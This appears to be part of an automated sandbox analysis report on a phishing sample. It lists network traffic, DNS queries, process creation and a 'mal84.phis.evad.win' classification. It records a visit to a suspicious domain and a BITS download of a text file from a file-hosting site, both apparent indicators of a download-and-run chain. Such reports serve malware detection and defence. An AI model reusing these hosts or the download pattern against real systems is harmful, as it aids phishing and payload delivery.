Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /cj06ld.txt HTTP/1.1host: files.catbox.moeaccept: */*accept-encoding: identityif-unmodified-since: Tue, 27 May 2025 17:01:28 GMTuser-agent: Microsoft BITS/7.8

Source: global traffic	DNS traffic detected: DNS query: confirm-id2719.click
Source: global traffic	DNS traffic detected: DNS query: partner.booking.com
Source: global traffic	DNS traffic detected: DNS query: bstatic.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic	DNS traffic detected: DNS query: munchkin.marketo.net
Source: global traffic	DNS traffic detected: DNS query: try.abtasty.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: files.catbox.moe

Source: unknown

HTTP traffic detected: POST /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://confirm-id2719.clickSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2

System Summary

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: classification engine

Classification label: mal84.phis.evad.win@29/11@23/214

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\BIT8664.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yirvsiyf.smg.ps1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\svchost.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
